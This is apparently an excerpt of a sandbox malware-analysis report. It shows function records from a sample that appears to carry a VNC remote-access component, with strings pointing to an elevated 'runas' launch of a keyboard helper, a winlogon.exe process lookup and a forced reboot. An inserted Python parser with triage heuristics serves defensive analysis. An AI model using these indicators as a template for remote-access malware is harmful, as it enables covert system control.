                                                                        • Part of subcall function 00007FF7E512B240: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E512B263
                                                                        • Part of subcall function 00007FF7E50C3690: OutputDebugStringA.KERNEL32(?,?,?,?,?,00007FF7E50C385F), ref: 00007FF7E50C36A9
                                                                        • Part of subcall function 00007FF7E50C3690: GetStdHandle.KERNEL32(?,?,?,?,?,00007FF7E50C385F), ref: 00007FF7E50C36D1
                                                                        • Part of subcall function 00007FF7E50C3690: WriteConsoleA.KERNEL32 ref: 00007FF7E50C36EE
                                                                        • Part of subcall function 00007FF7E50C3690: WriteFile.KERNEL32(?,?,?,?,?,00007FF7E50C385F), ref: 00007FF7E50C3725
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorFileLastTimeWrite$ConsoleDebugFormatHandleMessageOutputStringSystem_errno_invalid_parameter_noinfosprintf
                                                                      • String ID: --$error code 0x%08X
                                                                      • API String ID: 1897734068-3878996968
                                                                      • Opcode ID: efd08b52188bb8304a99cb4b7993a8a97ecc2afbd75597a5911adc055181aade
                                                                      • Instruction ID: b161521fd6aa4a54a5ce76281be54c5b107ab7b143e4ca2bb03d06b5bdc92c61
                                                                      • Opcode Fuzzy Hash: efd08b52188bb8304a99cb4b7993a8a97ecc2afbd75597a5911adc055181aade
                                                                      • Instruction Fuzzy Hash: B531C535B0878581EB20EB25F4243AAA760FB85FA4F944336EB5D876C9DF3CD0058711
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __doserrno_errno
                                                                      • String ID:
                                                                      • API String ID: 921712934-0
                                                                      • Opcode ID: 32eb1db604c35a1bd73017e45f5c353669c4e319d3a98b1b574dd58bb646ad4a
                                                                      • Instruction ID: c5abcdaff0667e54d6b9205b72d194cd76742334decc14fcdc9fb9d00751d0c8
                                                                      • Opcode Fuzzy Hash: 32eb1db604c35a1bd73017e45f5c353669c4e319d3a98b1b574dd58bb646ad4a
                                                                      • Instruction Fuzzy Hash: 0421F126A0C68A85E3017F64F86177DA5506F82F60FC94137EA1C872DACE7CA442E732
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExecuteFileModuleNameShellfclose
                                                                      • String ID: \uvnckeyboardhelper.exe$p$runas
                                                                      • API String ID: 3322125093-2954907143
                                                                      • Opcode ID: 037d2c38e5ac395d24b8413dad22403111c8ed725fed3ca7cb3e142dbe59519c
                                                                      • Instruction ID: 39394c1b89647f29ca3e0210760419ed980b59bc8e21dafee4aa9e12e4d4b12e
                                                                      • Opcode Fuzzy Hash: 037d2c38e5ac395d24b8413dad22403111c8ed725fed3ca7cb3e142dbe59519c
                                                                      • Instruction Fuzzy Hash: 52314135608B8695EB61AB14F4613AAB3A0FB88B50F804137DA9D83B99DF3CD114CB11
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __doserrno_close_nolock_errno
                                                                      • String ID:
                                                                      • API String ID: 186997739-0
                                                                      • Opcode ID: 0c6e4c21da35182ad9278105eade7e0fa1460cea4b5bf11609be99456b1b247b
                                                                      • Instruction ID: 58bed7295ee352a536e92715ccaec7c84d0e892617d14260653f762774ba2318
                                                                      • Opcode Fuzzy Hash: 0c6e4c21da35182ad9278105eade7e0fa1460cea4b5bf11609be99456b1b247b
                                                                      • Instruction Fuzzy Hash: 4211C326E0C28AC5F3057F61B86577CA7506F81F51FD94636E61D872DACE7CA440A332
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Desktop$Thread$CloseCurrentInputMessageOpen
                                                                      • String ID:
                                                                      • API String ID: 1973726940-0
                                                                      • Opcode ID: 74b4376dc008a2e3deaa89793efa6c2b5ae9ae972eae381437ecec0259b7ff16
                                                                      • Instruction ID: a82f27e590622abe72658bcc573cc2ec057e8917468f163b663c383dc26f5d7b
                                                                      • Opcode Fuzzy Hash: 74b4376dc008a2e3deaa89793efa6c2b5ae9ae972eae381437ecec0259b7ff16
                                                                      • Instruction Fuzzy Hash: 69119025B1DA4982EB24BB62B464639E7A0BB4DFD0F441836EE4EC3B58DE3CD4418711
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Timer$KillMessageModePostQuitWindow
                                                                      • String ID: d
                                                                      • API String ID: 3664928928-2564639436
                                                                      • Opcode ID: 118553bd85ce4610845fc2bc57698abad58593aa61c72bc6e801eda45dbd9551
                                                                      • Instruction ID: aa5e433f895118e28a88ae8af30c9a5fac72020100f0a1a4277f9a4e19cf55c3
                                                                      • Opcode Fuzzy Hash: 118553bd85ce4610845fc2bc57698abad58593aa61c72bc6e801eda45dbd9551
                                                                      • Instruction Fuzzy Hash: B311A7B2F1860B87F7707B34B825775A290EF44BA1FC45231D91AC56D4EE3CD991CA22
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Window$Long$DialogForegroundItemText
                                                                      • String ID: Oct 1 2014 21:43:49
                                                                      • API String ID: 2747855613-2751236551
                                                                      • Opcode ID: 9a61f633431cb37e218c1f842c908c6751c059a7ba695ef3b628182b3906ce08
                                                                      • Instruction ID: 3014d5cca1c240b60387ef3a932096e96c2238cd7b5690b692f2e55bdb823847
                                                                      • Opcode Fuzzy Hash: 9a61f633431cb37e218c1f842c908c6751c059a7ba695ef3b628182b3906ce08
                                                                      • Instruction Fuzzy Hash: FA119631A0CF4681E320AB26A9A473AA361FB85FD0F944132EA8A47B98DF3CD541D755
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AsyncState$Virtual
                                                                      • String ID: down$vnckeymap.cpp : new state %d (%s)$vnckeymap.cpp : setshiftstate %d - (%s->%s)
                                                                      • API String ID: 2891131044-1915745809
                                                                      • Opcode ID: af929e24d0095cd63bb2d8a54ee9630447cb1a074a3e2900237919080e080432
                                                                      • Instruction ID: a2be473cfdad0aa85a41cebfbc59de00fff76cdbbeb3fe71f97e39ea3eef9459
                                                                      • Opcode Fuzzy Hash: af929e24d0095cd63bb2d8a54ee9630447cb1a074a3e2900237919080e080432
                                                                      • Instruction Fuzzy Hash: 2A11D332A18A9AC2E6216F14F4102AAA361FB84B05F880032E98EC7659DF3CD515C362
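The function records above are emitted one per recovered function, each with its API calls, the strings the function references (joined with `$` in the "String ID" line), and fuzzy hashes usable for cross-sample similarity. The following is an added example, not Joe Sandbox code, that parses this record layout into structured data and applies a few triage heuristics of the author's own (the "runas" verb next to a ShellExecute-family call, a referenced `.exe` helper, debug logging, and a `__DATE__`-style build stamp such as the "Oct 1 2014 21:43:49" string). The `$` delimiter is an assumption inferred from the records on this page, and the sample input is a constructed, shortened copy of three records from this section.

```python
"""Parse Joe Sandbox function-similarity records into structured data and
flag the ones a triager would read first.

Added example (not Joe Sandbox code). Layout follows the report text above;
SAMPLE is a constructed, shortened copy of three records from the page; the
triage tags are the author's own heuristics, not report signatures.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# "• Key: value" lines that carry metadata inside a record.
KV_KEYS = ("Source File", "Associated", "Snapshot File", "API ID", "String ID",
           "API String ID", "Opcode ID", "Instruction ID",
           "Opcode Fuzzy Hash", "Instruction Fuzzy Hash")

# "• GetLastError.KERNEL32 ref: 00007FF7E50C3790" and
# "• Part of subcall function 00007FF7E5127BF0: Foo.KERNEL32(?,?), ref: 00007FF7E5127BFE"
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\([^)]*\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
# Compiler __DATE__ " " __TIME__ stamps, e.g. "Oct 1 2014 21:43:49".
BUILD_STAMP_RE = re.compile(r"^[A-Z][a-z]{2} +\d{1,2} \d{4} \d{2}:\d{2}:\d{2}$")
ELEVATION_APIS = {"ShellExecuteA", "ShellExecuteW", "ShellExecuteExA", "ShellExecuteExW"}


@dataclass
class ApiCall:
    name: str
    module: str
    ref: str                       # call-site address
    subcall_of: Optional[str] = None  # set when the call sits in a subcall


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)

    def api_names(self) -> set:
        return {a.name for a in self.apis}


def parse_records(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                 # every record opens with this header
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue                       # bare section headers carry no data
        body = line[1:].strip()
        key, sep, value = body.partition(":")
        if sep and key in KV_KEYS:
            value = re.sub(r"Download File$", "", value.strip()).strip()  # link residue
            if key == "String ID":
                # Assumption: strings are joined with "$"; a literal "$" inside a
                # string cannot be told apart from the delimiter.
                cur.strings = [s for s in value.split("$") if s]
            elif key != "Associated":      # the dump list is identical for every record
                cur.fields[key] = value
            continue
        m = API_RE.match(body)
        if m:
            cur.apis.append(ApiCall(m["name"], m["module"], m["ref"], m["sub"]))
    return records


def triage(rec: FunctionRecord) -> List[str]:
    """Author's heuristic tags, sorted for stable comparison."""
    tags = set()
    api_id = rec.fields.get("API ID", "")   # Joe Sandbox lists API name tokens here
    names = rec.api_names()
    shell_execute = ("Shell" in api_id and "Execute" in api_id) or bool(names & ELEVATION_APIS)
    if "runas" in rec.strings and shell_execute:
        tags.add("runas-elevation")        # ShellExecute with the "runas" verb: UAC/elevated launch
    if any(s.lower().endswith(".exe") for s in rec.strings):
        tags.add("spawns-exe")             # a helper binary is named in the function
    if names & {"OutputDebugStringA", "OutputDebugStringW"}:
        tags.add("debug-logging")
    if any(BUILD_STAMP_RE.match(s) for s in rec.strings):
        tags.add("build-timestamp")
    return sorted(tags)


# Constructed sample: three records copied (shortened) from this section.
SAMPLE = r"""
APIs
  • Part of subcall function 00007FF7E5127BF0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF7E50C3771), ref: 00007FF7E5127BFE
• GetLastError.KERNEL32 ref: 00007FF7E50C3790
• FormatMessageA.KERNEL32 ref: 00007FF7E50C37EB
• sprintf.LIBCMT ref: 00007FF7E50C3804
  • Part of subcall function 00007FF7E50C3690: OutputDebugStringA.KERNEL32(?,?,?,?,?,00007FF7E50C385F), ref: 00007FF7E50C36A9
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
Similarity
• API ID: ErrorFileLastTimeWrite$ConsoleDebugFormatHandleMessageOutputStringSystem_errno_invalid_parameter_noinfosprintf
• String ID: --$error code 0x%08X
• Instruction Fuzzy Hash: B531C535B0878581EB20EB25F4243AAA760FB85FA4F944336EB5D876C9DF3CD0058711
APIs
Similarity
• API ID: ExecuteFileModuleNameShellfclose
• String ID: \uvnckeyboardhelper.exe$p$runas
• Instruction Fuzzy Hash: 52314135608B8695EB61AB14F4613AAB3A0FB88B50F804137DA9D83B99DF3CD114CB11
APIs
Similarity
• API ID: Window$Long$DialogForegroundItemText
• String ID: Oct 1 2014 21:43:49
• Instruction Fuzzy Hash: FA119631A0CF4681E320AB26A9A473AA361FB85FD0F944132EA8A47B98DF3CD541D755
"""

if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE)):
        print(i, rec.fields.get("API ID"), rec.strings, triage(rec))
```

Feeding the whole disassembly section through `parse_records` gives one record per function; the "Instruction Fuzzy Hash" values can then be compared across reports to cluster samples, and the triage tags pick out the `runas` launch of the keyboard helper as the first function to open in the disassembler.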
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Event$ObjectResetSingleWait$CriticalEnterSection
                                                                      • String ID:
                                                                      • API String ID: 3343876880-0
                                                                      • Opcode ID: d3057a2b6849e393004495c8da3765230f28397fe0c1293d29a74e0cbff77646
                                                                      • Instruction ID: 3db3969fcc5efc9ae8c60e94462edcc4b0776fa73f749b994b5e1c9c32c21250
                                                                      • Opcode Fuzzy Hash: d3057a2b6849e393004495c8da3765230f28397fe0c1293d29a74e0cbff77646
                                                                      • Instruction Fuzzy Hash: A2214575604745D3DB68AB22E59836DA320FB45F91F405032DB1E87654DF3CE4B4C751
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                      • String ID: winlogon.exe
                                                                      • API String ID: 1789362936-961692650
                                                                      • Opcode ID: c88a6ee81a24712a405af00b899bfba8e059bc7f51f311d566bee420794a0777
                                                                      • Instruction ID: 664712c371dd72e0b10ce73a699733e9ab0bff484843a705344e07b7a48de42f
                                                                      • Opcode Fuzzy Hash: c88a6ee81a24712a405af00b899bfba8e059bc7f51f311d566bee420794a0777
                                                                      • Instruction Fuzzy Hash: 08112831608A8E81E720AB25F865767B3A0FF88F95F845132D55E86698EF3CD505CA11
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                      • String ID: -rebootforce$p$runas
                                                                      • API String ID: 3648085421-45594291
                                                                      • Opcode ID: c9e64b892c4310a2a8aa35deb39eabc56664ec1848822a0344db8a204f455f45
                                                                      • Instruction ID: 479bdbbad42336b06dd2ff58d54053efc831bdfef4747b77756f8b197db15ad2
                                                                      • Opcode Fuzzy Hash: c9e64b892c4310a2a8aa35deb39eabc56664ec1848822a0344db8a204f455f45
                                                                      • Instruction Fuzzy Hash: FB010C35608B8585E721AF14F49439BB3A4FB88744F800136D6CD42B58DF3CD158CB51
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
